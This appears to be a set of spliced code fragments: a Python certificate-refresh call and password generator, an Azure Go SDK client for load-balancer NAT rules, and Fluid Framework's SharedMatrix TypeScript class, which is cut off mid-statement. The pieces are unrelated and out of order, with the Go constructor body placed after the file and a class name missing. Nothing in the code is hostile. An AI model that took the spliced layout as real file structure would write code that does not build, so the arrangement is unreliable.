subprocess.check_call(['update-ca-certificates', '--fresh'])
"""Generate a random pasword.""" if length is None: # A random length is ok to use a weak PRNG length = random.choice(range(35, 45)) alphanumeric_chars = [ l for l in (string.ascii_letters + string.digits) if l not in 'l0QD1vAEIOUaeiou'] # Use a crypto-friendly PRNG (e.g. /dev/urandom) for making the # actual password random_generator = random.SystemRandom() random_chars = [ random_generator.choice(alphanumeric_chars) for _ in range(length)] return(''.join(random_chars))
inboundnatrules.go
package network // Copyright (c) Microsoft and contributors. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // // See the License for the specific language governing permissions and // limitations under the License. // // Code generated by Microsoft (R) AutoRest Code Generator. // Changes may cause incorrect behavior and will be lost if the code is regenerated. import ( "context" "github.com/Azure/go-autorest/autorest" "github.com/Azure/go-autorest/autorest/azure" "github.com/Azure/go-autorest/autorest/validation" "github.com/Azure/go-autorest/tracing" "net/http" ) // InboundNatRulesClient is the network Client type InboundNatRulesClient struct { BaseClient } // NewInboundNatRulesClient creates an instance of the InboundNatRulesClient client. func NewInboundNatRulesClient(subscriptionID string) InboundNatRulesClient { return NewInboundNatRulesClientWithBaseURI(DefaultBaseURI, subscriptionID) } // NewInboundNatRulesClientWithBaseURI creates an instance of the InboundNatRulesClient client using a custom endpoint. // Use this when interacting with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure stack). func NewInboundNatRulesClientWithBaseURI(baseURI string, subscriptionID string) InboundNatRulesClient
// CreateOrUpdate creates or updates a load balancer inbound nat rule. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. // inboundNatRuleName - the name of the inbound nat rule. // inboundNatRuleParameters - parameters supplied to the create or update inbound nat rule operation. func (client InboundNatRulesClient) CreateOrUpdate(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, inboundNatRuleParameters InboundNatRule) (result InboundNatRulesCreateOrUpdateFuture, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.CreateOrUpdate") defer func() { sc := -1 if result.Response() != nil { sc = result.Response().StatusCode } tracing.EndSpan(ctx, sc, err) }() } if err := validation.Validate([]validation.Validation{ {TargetValue: inboundNatRuleParameters, Constraints: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat.IPConfiguration", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat.IPConfiguration.IPConfigurationPropertiesFormat", Name: validation.Null, Rule: false, Chain: []validation.Constraint{{Target: "inboundNatRuleParameters.InboundNatRulePropertiesFormat.BackendIPConfiguration.InterfaceIPConfigurationPropertiesFormat.PublicIPAddress.PublicIPAddressPropertiesFormat.IPConfiguration.IPConfigurationPropertiesFormat.PublicIPAddress", Name: validation.Null, Rule: false, Chain: nil}}}, }}, }}, }}, }}, }}, }}}}}); err != nil { return result, validation.NewError("network.InboundNatRulesClient", "CreateOrUpdate", err.Error()) } req, err := client.CreateOrUpdatePreparer(ctx, resourceGroupName, loadBalancerName, inboundNatRuleName, inboundNatRuleParameters) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "CreateOrUpdate", nil, "Failure preparing request") return } result, err = client.CreateOrUpdateSender(req) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "CreateOrUpdate", result.Response(), "Failure sending request") return } return } // CreateOrUpdatePreparer prepares the CreateOrUpdate request. func (client InboundNatRulesClient) CreateOrUpdatePreparer(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, inboundNatRuleParameters InboundNatRule) (*http.Request, error) { pathParameters := map[string]interface{}{ "inboundNatRuleName": autorest.Encode("path", inboundNatRuleName), "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } inboundNatRuleParameters.Etag = nil inboundNatRuleParameters.Type = nil preparer := autorest.CreatePreparer( autorest.AsContentType("application/json; charset=utf-8"), autorest.AsPut(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules/{inboundNatRuleName}", pathParameters), autorest.WithJSON(inboundNatRuleParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // CreateOrUpdateSender sends the CreateOrUpdate request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) CreateOrUpdateSender(req *http.Request) (future InboundNatRulesCreateOrUpdateFuture, err error) { var resp *http.Response resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client)) if err != nil { return } future.Future, err = azure.NewFutureFromResponse(resp) return } // CreateOrUpdateResponder handles the response to the CreateOrUpdate request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) CreateOrUpdateResponder(resp *http.Response) (result InboundNatRule, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusCreated), autorest.ByUnmarshallingJSON(&result), autorest.ByClosing()) result.Response = autorest.Response{Response: resp} return } // Delete deletes the specified load balancer inbound nat rule. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. // inboundNatRuleName - the name of the inbound nat rule. func (client InboundNatRulesClient) Delete(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string) (result InboundNatRulesDeleteFuture, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.Delete") defer func() { sc := -1 if result.Response() != nil { sc = result.Response().StatusCode } tracing.EndSpan(ctx, sc, err) }() } req, err := client.DeletePreparer(ctx, resourceGroupName, loadBalancerName, inboundNatRuleName) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Delete", nil, "Failure preparing request") return } result, err = client.DeleteSender(req) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Delete", result.Response(), "Failure sending request") return } return } // DeletePreparer prepares the Delete request. func (client InboundNatRulesClient) DeletePreparer(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string) (*http.Request, error) { pathParameters := map[string]interface{}{ "inboundNatRuleName": autorest.Encode("path", inboundNatRuleName), "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } preparer := autorest.CreatePreparer( autorest.AsDelete(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules/{inboundNatRuleName}", pathParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // DeleteSender sends the Delete request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) DeleteSender(req *http.Request) (future InboundNatRulesDeleteFuture, err error) { var resp *http.Response resp, err = client.Send(req, azure.DoRetryWithRegistration(client.Client)) if err != nil { return } future.Future, err = azure.NewFutureFromResponse(resp) return } // DeleteResponder handles the response to the Delete request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent), autorest.ByClosing()) result.Response = resp return } // Get gets the specified load balancer inbound nat rule. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. // inboundNatRuleName - the name of the inbound nat rule. // expand - expands referenced resources. func (client InboundNatRulesClient) Get(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, expand string) (result InboundNatRule, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.Get") defer func() { sc := -1 if result.Response.Response != nil { sc = result.Response.Response.StatusCode } tracing.EndSpan(ctx, sc, err) }() } req, err := client.GetPreparer(ctx, resourceGroupName, loadBalancerName, inboundNatRuleName, expand) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Get", nil, "Failure preparing request") return } resp, err := client.GetSender(req) if err != nil { result.Response = autorest.Response{Response: resp} err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Get", resp, "Failure sending request") return } result, err = client.GetResponder(resp) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "Get", resp, "Failure responding to request") } return } // GetPreparer prepares the Get request. func (client InboundNatRulesClient) GetPreparer(ctx context.Context, resourceGroupName string, loadBalancerName string, inboundNatRuleName string, expand string) (*http.Request, error) { pathParameters := map[string]interface{}{ "inboundNatRuleName": autorest.Encode("path", inboundNatRuleName), "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } if len(expand) > 0 { queryParameters["$expand"] = autorest.Encode("query", expand) } preparer := autorest.CreatePreparer( autorest.AsGet(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules/{inboundNatRuleName}", pathParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // GetSender sends the Get request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) GetSender(req *http.Request) (*http.Response, error) { return client.Send(req, azure.DoRetryWithRegistration(client.Client)) } // GetResponder handles the response to the Get request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) GetResponder(resp *http.Response) (result InboundNatRule, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK), autorest.ByUnmarshallingJSON(&result), autorest.ByClosing()) result.Response = autorest.Response{Response: resp} return } // List gets all the inbound nat rules in a load balancer. // Parameters: // resourceGroupName - the name of the resource group. // loadBalancerName - the name of the load balancer. func (client InboundNatRulesClient) List(ctx context.Context, resourceGroupName string, loadBalancerName string) (result InboundNatRuleListResultPage, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.List") defer func() { sc := -1 if result.inrlr.Response.Response != nil { sc = result.inrlr.Response.Response.StatusCode } tracing.EndSpan(ctx, sc, err) }() } result.fn = client.listNextResults req, err := client.ListPreparer(ctx, resourceGroupName, loadBalancerName) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "List", nil, "Failure preparing request") return } resp, err := client.ListSender(req) if err != nil { result.inrlr.Response = autorest.Response{Response: resp} err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "List", resp, "Failure sending request") return } result.inrlr, err = client.ListResponder(resp) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "List", resp, "Failure responding to request") } return } // ListPreparer prepares the List request. func (client InboundNatRulesClient) ListPreparer(ctx context.Context, resourceGroupName string, loadBalancerName string) (*http.Request, error) { pathParameters := map[string]interface{}{ "loadBalancerName": autorest.Encode("path", loadBalancerName), "resourceGroupName": autorest.Encode("path", resourceGroupName), "subscriptionId": autorest.Encode("path", client.SubscriptionID), } const APIVersion = "2020-04-01" queryParameters := map[string]interface{}{ "api-version": APIVersion, } preparer := autorest.CreatePreparer( autorest.AsGet(), autorest.WithBaseURL(client.BaseURI), autorest.WithPathParameters("/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/inboundNatRules", pathParameters), autorest.WithQueryParameters(queryParameters)) return preparer.Prepare((&http.Request{}).WithContext(ctx)) } // ListSender sends the List request. The method will close the // http.Response Body if it receives an error. func (client InboundNatRulesClient) ListSender(req *http.Request) (*http.Response, error) { return client.Send(req, azure.DoRetryWithRegistration(client.Client)) } // ListResponder handles the response to the List request. The method always // closes the http.Response Body. func (client InboundNatRulesClient) ListResponder(resp *http.Response) (result InboundNatRuleListResult, err error) { err = autorest.Respond( resp, client.ByInspecting(), azure.WithErrorUnlessStatusCode(http.StatusOK), autorest.ByUnmarshallingJSON(&result), autorest.ByClosing()) result.Response = autorest.Response{Response: resp} return } // listNextResults retrieves the next set of results, if any. func (client InboundNatRulesClient) listNextResults(ctx context.Context, lastResults InboundNatRuleListResult) (result InboundNatRuleListResult, err error) { req, err := lastResults.inboundNatRuleListResultPreparer(ctx) if err != nil { return result, autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "listNextResults", nil, "Failure preparing next results request") } if req == nil { return } resp, err := client.ListSender(req) if err != nil { result.Response = autorest.Response{Response: resp} return result, autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "listNextResults", resp, "Failure sending next results request") } result, err = client.ListResponder(resp) if err != nil { err = autorest.NewErrorWithError(err, "network.InboundNatRulesClient", "listNextResults", resp, "Failure responding to next results request") } return } // ListComplete enumerates all values, automatically crossing page boundaries as required. func (client InboundNatRulesClient) ListComplete(ctx context.Context, resourceGroupName string, loadBalancerName string) (result InboundNatRuleListResultIterator, err error) { if tracing.IsEnabled() { ctx = tracing.StartSpan(ctx, fqdn+"/InboundNatRulesClient.List") defer func() { sc := -1 if result.Response().Response.Response != nil { sc = result.page.Response().Response.Response.StatusCode } tracing.EndSpan(ctx, sc, err) }() } result.page, err = client.List(ctx, resourceGroupName, loadBalancerName) return }
{ return InboundNatRulesClient{NewWithBaseURI(baseURI, subscriptionID)} }
matrix.ts
/*! * Copyright (c) Microsoft Corporation and contributors. All rights reserved. * Licensed under the MIT License. */ import { assert } from "@fluidframework/common-utils"; import { IFluidSerializer } from "@fluidframework/core-interfaces"; import { FileMode, ISequencedDocumentMessage, ITree, TreeEntry, } from "@fluidframework/protocol-definitions"; import { IFluidDataStoreRuntime, IChannelStorageService, Serializable, IChannelAttributes, } from "@fluidframework/datastore-definitions"; import { makeHandlesSerializable, parseHandles, SharedObject, } from "@fluidframework/shared-object-base"; import { ObjectStoragePartition } from "@fluidframework/runtime-utils"; import { IMatrixProducer, IMatrixConsumer, IMatrixReader, IMatrixWriter, } from "@tiny-calc/nano"; import { MergeTreeDeltaType, IMergeTreeOp, SegmentGroup, ISegment } from "@fluidframework/merge-tree"; import { debug } from "./debug"; import { MatrixOp } from "./ops"; import { PermutationVector, PermutationSegment } from "./permutationvector"; import { SparseArray2D } from "./sparsearray2d"; import { SharedMatrixFactory } from "./runtime"; import { Handle, isHandleValid } from "./handletable"; import { deserializeBlob, serializeBlob } from "./serialization"; import { ensureRange } from "./range"; import { IUndoConsumer } from "./types"; import { MatrixUndoProvider } from "./undoprovider"; const enum SnapshotPath { rows = "rows", cols = "cols", cells = "cells", } interface ISetOp<T> { type: MatrixOp.set, row: number, col: number, value: T, } interface ISetOpMetadata { rowHandle: Handle, colHandle: Handle, localSeq: number, } /** * A SharedMatrix holds a rectangular 2D array of values. Supported operations * include setting values and inserting/removing rows and columns. * * Matrix values may be any Fluid serializable type, which is the set of JSON * serializable types extended to include IFluidHandles. * * Fluid's SharedMatrix implementation works equally well for dense and sparse * matrix data and physically stores data in Z-order to leverage CPU caches and * prefetching when reading in either row or column major order. (See README.md * for more details.) */ export class
<T extends Serializable = Serializable> extends SharedObject implements IMatrixProducer<T | undefined | null>, IMatrixReader<T | undefined | null>, IMatrixWriter<T | undefined> { private readonly consumers = new Set<IMatrixConsumer<T | undefined | null>>(); public static getFactory() { return new SharedMatrixFactory(); } private readonly rows: PermutationVector; // Map logical row to storage handle (if any) private readonly cols: PermutationVector; // Map logical col to storage handle (if any) private cells = new SparseArray2D<T>(); // Stores cell values. private pending = new SparseArray2D<number>(); // Tracks pending writes. constructor(runtime: IFluidDataStoreRuntime, public id: string, attributes: IChannelAttributes) { super(id, runtime, attributes); this.rows = new PermutationVector( SnapshotPath.rows, this.logger, runtime, this.onRowDelta, this.onRowHandlesRecycled); this.cols = new PermutationVector( SnapshotPath.cols, this.logger, runtime, this.onColDelta, this.onColHandlesRecycled); } private undo?: MatrixUndoProvider; /** * Subscribes the given IUndoConsumer to the matrix. */ public openUndo(consumer: IUndoConsumer) { assert(this.undo === undefined, 0x019 /* "SharedMatrix.openUndo() supports at most a single IUndoConsumer." */); this.undo = new MatrixUndoProvider(consumer, this, this.rows, this.cols); } // TODO: closeUndo()? private get rowHandles() { return this.rows.handleCache; } private get colHandles() { return this.cols.handleCache; } /** * {@inheritDoc @fluidframework/datastore-definitions#IChannelFactory.create} */ public static create<T extends Serializable = Serializable>(runtime: IFluidDataStoreRuntime, id?: string) { return runtime.createChannel(id, SharedMatrixFactory.Type) as SharedMatrix<T>; } // #region IMatrixProducer openMatrix(consumer: IMatrixConsumer<T | undefined | null>): IMatrixReader<T | undefined | null> { this.consumers.add(consumer); return this; } closeMatrix(consumer: IMatrixConsumer<T | undefined | null>): void { this.consumers.delete(consumer); } // #endregion IMatrixProducer // #region IMatrixReader public get rowCount() { return this.rows.getLength(); } public get colCount() { return this.cols.getLength(); } public getCell(row: number, col: number): T | undefined | null { // Perf: When possible, bounds checking is performed inside the implementation for // 'getHandle()' so that it can be elided in the case of a cache hit. This // yields an ~40% improvement in the case of a cache hit (node v12 x64) // Map the logical (row, col) to associated storage handles. const rowHandle = this.rowHandles.getHandle(row); if (isHandleValid(rowHandle)) { const colHandle = this.colHandles.getHandle(col); if (isHandleValid(colHandle)) { return this.cells.getCell(rowHandle, colHandle); } } else { // If we early exit because the given rowHandle is unallocated, we still need to // bounds-check the 'col' parameter. ensureRange(col, this.cols.getLength()); } return undefined; } public get matrixProducer(): IMatrixProducer<T | undefined | null> { return this; } // #endregion IMatrixReader public setCell(row: number, col: number, value: T) { assert(0 <= row && row < this.rowCount && 0 <= col && col < this.colCount, 0x01a /* "Trying to set out-of-bounds cell!" */); this.setCellCore(row, col, value); // Avoid reentrancy by raising change notifications after the op is queued. for (const consumer of this.consumers.values()) { consumer.cellsChanged(row, col, 1, 1, this); } } public setCells(rowStart: number, colStart: number, colCount: number, values: readonly T[]) { const rowCount = Math.ceil(values.length / colCount); assert((0 <= rowStart && rowStart < this.rowCount) && (0 <= colStart && colStart < this.colCount) && (1 <= colCount && colCount <= (this.colCount - colStart)) && (rowCount <= (this.rowCount - rowStart)), 0x01b /* "Trying to set multiple out-of-bounds cells!" */); const endCol = colStart + colCount; let r = rowStart; let c = colStart; for (const value of values) { this.setCellCore(r, c, value); if (++c === endCol) { c = colStart; r++; } } // Avoid reentrancy by raising change notifications after the op is queued. for (const consumer of this.consumers.values()) { consumer.cellsChanged(rowStart, colStart, rowCount, colCount, this); } } private setCellCore( row: number, col: number, value: T, rowHandle = this.rows.getAllocatedHandle(row), colHandle = this.cols.getAllocatedHandle(col), ) { if (this.undo !== undefined) { this.undo.cellSet( rowHandle, colHandle, /* oldvalue: */ this.cells.getCell(rowHandle, colHandle)); } this.cells.setCell(rowHandle, colHandle, value); if (this.isAttached()) { this.sendSetCellOp(row, col, value, rowHandle, colHandle); } } private sendSetCellOp( row: number, col: number, value: T, rowHandle: Handle, colHandle: Handle, localSeq = this.nextLocalSeq(), ) { assert(this.isAttached(), 0x1e2 /* "Caller must ensure 'isAttached()' before calling 'sendSetCellOp'." */); const op: ISetOp<T> = { type: MatrixOp.set, row, col, value, }; const metadata: ISetOpMetadata = { rowHandle, colHandle, localSeq, }; this.submitLocalMessage(op, metadata); this.pending.setCell(rowHandle, colHandle, localSeq); } private submitVectorMessage( currentVector: PermutationVector, oppositeVector: PermutationVector, dimension: SnapshotPath.rows | SnapshotPath.cols, message: any, ) { // Ideally, we would have a single 'localSeq' counter that is shared between both PermutationVectors // and the SharedMatrix's cell data. Instead, we externally advance each MergeTree's 'localSeq' counter // for each submitted op it not aware of to keep them synchronized. const localSeq = currentVector.getCollabWindow().localSeq; const oppositeWindow = oppositeVector.getCollabWindow(); // Note that the comparison is '>=' because, in the case the MergeTree is regenerating ops for reconnection, // the MergeTree submits the op with the original 'localSeq'. assert(localSeq >= oppositeWindow.localSeq, 0x01c /* "The 'localSeq' of the vector submitting an op must >= the 'localSeq' of the other vector." */); oppositeWindow.localSeq = localSeq; // If the SharedMatrix is local, it's state will be submitted via a Snapshot when initially connected. // Do not queue a message or track the pending op, as there will never be an ACK, etc. if (this.isAttached()) { // Record whether this `op` targets rows or cols. (See dispatch in `processCore()`) message.target = dimension; this.submitLocalMessage( message, currentVector.peekPendingSegmentGroups( message.type === MergeTreeDeltaType.GROUP ? message.ops.length : 1)); } } private submitColMessage(message: any) { this.submitVectorMessage(this.cols, this.rows, SnapshotPath.cols, message); } public insertCols(colStart: number, count: number) { this.submitColMessage(this.cols.insert(colStart, count)); } public removeCols(colStart: number, count: number) { this.submitColMessage(this.cols.remove(colStart, count)); } private submitRowMessage(message: any) { this.submitVectorMessage(this.rows, this.cols, SnapshotPath.rows, message); } public insertRows(rowStart: number, count: number) { this.submitRowMessage(this.rows.insert(rowStart, count)); } public removeRows(rowStart: number, count: number) { this.submitRowMessage(this.rows.remove(rowStart, count)); } /** @internal */ public _undoRemoveRows(segment: ISegment) { const original = segment as PermutationSegment; // (Re)insert the removed number of rows at the original position. const { op, inserted } = this.rows.insertRelative(original, original.cachedLength); this.submitRowMessage(op); // Transfer handles from the original segment to the newly inserted empty segment. original.transferHandlesTo(inserted); // Invalidate the handleCache in case it was populated during the 'rowsChanged' // callback, which occurs before the handle span is populated. const rowStart = this.rows.getPosition(inserted); this.rows.handleCache.itemsChanged( rowStart, /* removedCount: */ 0, /* insertedCount: */ inserted.cachedLength); // Generate setCell ops for each populated cell in the reinserted rows. let rowHandle = inserted.start; const rowCount = inserted.cachedLength; for (let row = rowStart; row < rowStart + rowCount; row++, rowHandle++) { for (let col = 0; col < this.colCount; col++) { const colHandle = this.colHandles.getHandle(col); const value = this.cells.getCell(rowHandle, colHandle); // eslint-disable-next-line no-null/no-null if (this.isAttached() && value !== undefined && value !== null) { this.sendSetCellOp( row, col, value, rowHandle, colHandle); } } } // Avoid reentrancy by raising change notifications after the op is queued. for (const consumer of this.consumers.values()) { consumer.cellsChanged(rowStart, /* colStart: */ 0, rowCount, this.colCount, this); } } /** @internal */ public _undoRemoveCols(segment: ISegment) { const original = segment as PermutationSegment; // (Re)insert the removed number of columns at the original position. const { op, inserted } = this.cols.insertRelative(original, original.cachedLength); this.submitColMessage(op); // Transfer handles from the original segment to the newly inserted empty segment. original.transferHandlesTo(inserted); // Invalidate the handleCache in case it was populated during the 'colsChanged' // callback, which occurs before the handle span is populated. const colStart = this.cols.getPosition(inserted); this.cols.handleCache.itemsChanged( colStart, /* removedCount: */ 0, /* insertedCount: */ inserted.cachedLength); // Generate setCell ops for each populated cell in the reinserted cols. let colHandle = inserted.start; const colCount = inserted.cachedLength; for (let col = colStart; col < colStart + colCount; col++, colHandle++) { for (let row = 0; row < this.rowCount; row++) { const rowHandle = this.rowHandles.getHandle(row); const value = this.cells.getCell(rowHandle, colHandle); // eslint-disable-next-line no-null/no-null if (this.isAttached() && value !== undefined && value !== null) { this.sendSetCellOp( row, col, value, rowHandle, colHandle); } } } // Avoid reentrancy by raising change notifications after the op is queued. for (const consumer of this.consumers.values()) { consumer.cellsChanged(/* rowStart: */ 0, colStart, this.rowCount, colCount, this); } } protected snapshotCore(serializer: IFluidSerializer): ITree { const tree: ITree = { entries: [ { mode: FileMode.Directory, path: SnapshotPath.rows, type: TreeEntry.Tree, value: this.rows.snapshot(this.runtime, this.handle, serializer), }, { mode: FileMode.Directory, path: SnapshotPath.cols, type: TreeEntry.Tree, value: this.cols.snapshot(this.runtime, this.handle, serializer), }, serializeBlob( this.handle, SnapshotPath.cells, [ this.cells.snapshot(), this.pending.snapshot(), ], serializer), ], }; return tree; } /** * Advances the 'localSeq' counter for the cell data operation currently being queued. * * Do not use with 'submitColMessage()/submitRowMessage()' as these helpers + the MergeTree will * automatically advance 'localSeq'. */ private nextLocalSeq() { // Ideally, we would have a single 'localSeq' counter that is shared between both PermutationVectors // and the SharedMatrix's cell data. Instead, we externally bump each MergeTree's 'localSeq' counter // for SharedMatrix ops it's not aware of to keep them synchronized. (For cell data operations, we // need to bump both counters.) this.cols.getCollabWindow().localSeq++; return ++this.rows.getCollabWindow().localSeq; } protected submitLocalMessage(message: any, localOpMetadata?: any) { // TODO: Recommend moving this assertion into SharedObject // (See https://github.com/microsoft/FluidFramework/issues/2559) assert(this.isAttached() === true, 0x01d /* "Trying to submit message to runtime while detached!" */); super.submitLocalMessage(makeHandlesSerializable(message, this.serializer, this.handle), localOpMetadata); // Ensure that row/col 'localSeq' are synchronized (see 'nextLocalSeq()'). assert( this.rows.getCollabWindow().localSeq === this.cols.getCollabWindow().localSeq, 0x01e /* "Row and col collab window 'localSeq' desynchronized!" */, ); } protected didAttach() { // We've attached we need to start generating and sending ops. // so start collaboration and provide a default client id incase we are not connected if (this.isAttached()) { this.rows.startOrUpdateCollaboration(this.runtime.clientId ?? "attached"); this.cols.startOrUpdateCollaboration(this.runtime.clientId ?? "attached"); } } protected onConnect() { assert(this.rows.getCollabWindow().collaborating === this.cols.getCollabWindow().collaborating, 0x01f /* "Row and col collab window 'collaborating' status desynchronized!" */); // Update merge tree collaboration information with new client ID and then resend pending ops this.rows.startOrUpdateCollaboration(this.runtime.clientId as string); this.cols.startOrUpdateCollaboration(this.runtime.clientId as string); } protected reSubmitCore(content: any, localOpMetadata: unknown) { switch (content.target) { case SnapshotPath.cols: this.submitColMessage(this.cols.regeneratePendingOp( content as IMergeTreeOp, localOpMetadata as SegmentGroup | SegmentGroup[])); break; case SnapshotPath.rows: this.submitRowMessage(this.rows.regeneratePendingOp( content as IMergeTreeOp, localOpMetadata as SegmentGroup | SegmentGroup[])); break; default: { assert(content.type === MatrixOp.set, 0x020 /* "Unknown SharedMatrix 'op' type." */); const setOp = content as ISetOp<T>; const { rowHandle, colHandle, localSeq } = localOpMetadata as ISetOpMetadata; // If there are more pending local writes to the same row/col handle, it is important // to skip resubmitting this op since it is possible the row/col handle has been recycled // and now refers to a different position than when this op was originally submitted. if (this.isLatestPendingWrite(rowHandle, colHandle, localSeq)) { const row = this.rows.handleToPosition(rowHandle, localSeq); const col = this.cols.handleToPosition(colHandle, localSeq); if (row >= 0 && col >= 0) { this.sendSetCellOp( row, col, setOp.value, rowHandle, colHandle, localSeq, ); } } break; } } } protected onDisconnect() { debug(`${this.id} is now disconnected`); } /** * {@inheritDoc @fluidframework/shared-object-base#SharedObject.loadCore} */ protected async loadCore(storage: IChannelStorageService) { try { await this.rows.load( this.runtime, new ObjectStoragePartition(storage, SnapshotPath.rows), this.serializer); await this.cols.load( this.runtime, new ObjectStoragePartition(storage, SnapshotPath.cols), this.serializer); const [cellData, pendingCliSeqData] = await deserializeBlob(storage, SnapshotPath.cells, this.serializer); this.cells = SparseArray2D.load(cellData); this.pending = SparseArray2D.load(pendingCliSeqData); } catch (error) { this.logger.sendErrorEvent({ eventName: "MatrixLoadFailed" }, error); } } protected processCore(rawMessage: ISequencedDocumentMessage, local: boolean, localOpMetadata: unknown) { const msg = parseHandles(rawMessage, this.serializer); const contents = msg.contents; switch (contents.target) { case SnapshotPath.cols: this.cols.applyMsg(msg); break; case SnapshotPath.rows: this.rows.applyMsg(msg); break; default: { assert(contents.type === MatrixOp.set, 0x021 /* "SharedMatrix message contents have unexpected type!" */); const { referenceSequenceNumber: refSeq, clientId } = rawMessage; const { row, col } = contents; if (local) { // We are receiving the ACK for a local pending set operation. const { rowHandle, colHandle, localSeq } = localOpMetadata as ISetOpMetadata; // If this is the most recent write to the cell by the local client, remove our // entry from 'pendingCliSeqs' to resume allowing remote writes. if (this.isLatestPendingWrite(rowHandle, colHandle, localSeq)) { this.pending.setCell(rowHandle, colHandle, undefined); } } else { const rowClientId = this.rows.getOrAddShortClientId(clientId); const adjustedRow = this.rows.adjustPosition(row, refSeq, rowClientId); if (adjustedRow !== undefined) { const colClientId = this.cols.getOrAddShortClientId(clientId); const 